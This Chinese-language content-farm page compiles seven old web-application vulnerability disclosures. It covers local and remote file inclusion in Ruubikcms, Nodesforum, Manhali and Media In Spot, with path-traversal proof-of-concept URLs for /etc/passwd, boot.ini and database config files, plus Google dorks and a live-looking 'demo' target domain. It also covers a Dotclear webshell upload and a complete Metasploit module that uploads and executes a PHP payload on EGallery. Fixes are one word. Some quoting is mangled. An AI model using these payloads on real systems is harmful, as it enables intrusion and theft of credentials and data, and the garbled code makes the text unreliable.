Ruubikcms v 1.1.0文件包含缺陷及修复
“blondefo”通过精心收集,向本站投稿了7篇Ruubikcms v 1.1.0文件包含缺陷及修复,下面是小编给大家带来的Ruubikcms v 1.1.0文件包含缺陷及修复,以供大家参考,我们一起来看看吧!
篇1:Ruubikcms v 1.1.0文件包含缺陷及修复
技术分析:
source of /extra/image.php:
1: if (!isset($_GET['f']) OR empty($_GET['f'])) die(“Please specify 2: image.”);
3: $fpath = BASE_DIR.$_GET['f'];
4: if (!is_file($fpath)) die(“File does not exist.”);
5:
6: // file size in bytes
7: // $fsize = filesize($fpath);
8:
9: // get mime type
10: $mtype = '';
11:
12: if (function_exists('mime_content_type')) {
13: $mtype = mime_content_type($fpath);
14: } elseif (function_exists('finfo_file')) {
15: $finfo = finfo_open(FILEINFO_MIME); // return mime type
16: $mtype = finfo_file($finfo, $fpath);
17: finfo_close($finfo);
18: }
19:
20: if ($mtype == '') {
21: $mtype = “image/jpeg”;
22: }
23:
24: header(“Content-type: $mtype”);
25: readfile($fpath); <--------------------- LFI
测试方法:
/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../boot.ini
/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../[localfile]
修复:过滤
篇2:Nodesforum 1.059远程文件包含缺陷及修复
# Exploit Title: nodesforum 1.059 Remote File Inclusion Vulnerability
# Google Dork: inurl: powered by Nodesforum
# Date: 6/23/
# Author: bd0rk ( bd0rk[at]hackermail.com )
# Software-Download: home.nodesforum.com/download?file=nodesforum_1.059_with_bbcode_1.004.zip
# Tested on: Ubuntu-Linux / WinVista
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code in 3rd_party_limits.php line 6 - 8
--------------------------------------------------------------------------------------------------------------
$limits_cache_url=$_nodesforum_code_path.cache/.$_nodesforum_db_table_name_modifier._3rd_party_limits.php;
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time-(24*3600*14)))
{include($limits_cache_url);}
The parameter $limits_cache_url is declared with the other parameter $_nodesforum_code_path
So we can use the declared.
PoC: /nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]
Fixtip: Declare $_nodesforum_code_path, likewise!
Greetings: Kathrin J., Perle, x0r_32 and ZUBAIR ANJUM ;-)
#### The 22 years old, german Hacker bd0rk #### <---white-hat
篇3:Manhali v1.8本地文件包含缺陷及修复
标题 Manhali v1.8 Local File Inclusion Vulnerability
作者: L0n3ly-H34rT l0n3ly_h34rt@hotmail.com
程序开发: www.manhali.com/
下载地址: sourceforge.net/projects/manhali/files/manhali_1.8.zip/download
影响版本 : 1.8 (或许老版也受影响,未检查)
测试系统: Linux/Windows
############################################
# P.O.C :
/manhali/includes/download.php?f=../includes/dbconfig.php
############################################
# Greetz to my friendz
篇4:Media In Spot CMS本地文件包含缺陷及修复
#Name : Media In Spot LFI Vulnerability
#Date : May,16
#Vendor Url :http:www.mediainspot.com/
#Dork:“
”Powred By Media In Spot“”
#Author : wlhaan haker
#############################################################
Exploit:
server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################
Fix:
demo
/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
修复:过滤
篇5:media In Spot CMS本地文件包含缺陷及修复漏洞预警
#Name : Media In Spot LFI Vulnerability
#Date : May,16 2011
#Vendor Url :http:www.mediainspot.com/
#Dork:“
”Powred By Media In Spot“”
#Author : wlhaan haker
#############################################################
Exploit:
server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################
Fix:
demo
www.badguest.cn/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
www.badguest.cn/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
www.badguest.cn/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
修复:过滤
篇6:Dotclear 2.4.2任意文件上传缺陷及修复
标题: dotclear-2.4.2 (Swf) File Upload Vulnerability
作者: T0x!c Malik_99@hotmail.fr
程序下载地址: fr.dotclear.org/download
影响版本: 2.4.2
测试系统: [Windows Xp]
测试证明:
/path/inc/swf/swfupload.swf
你可以用php格式上传文件
例如: c99.php, shell.gif.php, 等等
www.2cto.co提供修复
加强验证
篇7:EGallery PHP文件上传缺陷及修复漏洞预警
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' =>“EGallery PHP File Upload Vulnerability”,
'Description' =>%q{
This module exploits a vulnerability found in EGallery 1.2 By abusing the
uploadify.php file, a malicious user can upload a file to the egallery/ directory
without any authentication, which results in arbitrary code execution. The module
has been tested successfully on Ubuntu 10.04.
},
'License' =>MSF_LICENSE,
'Author' =>
[
'Sammy FORGIT', # Discovery, PoC
'juan' # Metasploit module
],
'References' =>
[
['OSVDB', '83891'],
['BID', '54464'],
['URL', 'www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html']
],
'Payload' =>
{
'BadChars' =>“\x00”
},
'DefaultOptions' =>
{
'ExitFunction' =>“none”
},
'Platform' =>['php'],
'Arch' =>ARCH_PHP,
'Targets' =>
[
['EGallery 1.2', {}]
],
'Privileged' =>false,
'DisclosureDate' =>“Jul 08 2012”,
'DefaultTarget' =>0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to EGallery', '/sample'])
], self.class)
end
def check
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'method' =>'GET',
'uri' =>“#{uri}egallery/uploadify.php”
})
if res and res.code == 200 and res.body.empty?
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
www.2cto.com
def exploit
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = “#{rhost}:#{rport}”
payload_name = rand_text_alpha(rand(10) + 5) + '.php'
boundary = Rex::Text.rand_text_hex(7)
post_data = “--#{boundary}\r\n”
post_data << “Content-Disposition: form-data; name=\”Filename\“\r\n\r\n”
post_data << “#{payload_name}\r\n”
post_data << “--#{boundary}\r\n”
post_data << “Content-Disposition: form-data; name=\”folder\“\r\n\r\n”
post_data << “#{uri}\r\n”
post_data << “--#{boundary}\r\n”
post_data << “Content-Disposition: form-data; name=\”Filedata\“; filename=\”#{payload_name}\“\r\n\r\n”
post_data << “
post_data << payload.encoded
post_data << ” ?>\r\n“
post_data << ”--#{boundary}--\r\n“
print_status(”#{peer} - Sending PHP payload (#{payload_name})“)
res = send_request_cgi({
'method' =>'POST',
'uri' =>”#{uri}egallery/uploadify.php“,
'ctype' =>”multipart/form-data; boundary=#{boundary}“,
'data' =>post_data
})
# If the server returns 200 and the body contains our payload name,
# we assume we uploaded the malicious file successfully
if not res or res.code != 200 or res.body !~ /#{payload_name}/
print_error(”#{peer} - File wasn't uploaded, aborting!“)
return
end
print_status(”#{peer} - Executing PHP payload (#{payload_name})“)
# Execute our payload
res = send_request_cgi({
'method' =>'GET',
'uri' =>”#{uri}#{payload_name}“
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either. Print the status code for debugging purposes.
if res and res.code != 200
print_status(”#{peer} - Server returned #{res.code.to_s}")
end
end
end
【Ruubikcms v 1.1.0文件包含缺陷及修复】相关文章:
4.包含的解释及造句
6.缺陷近义词
10.包含济世的成语及解释
文档为doc格式
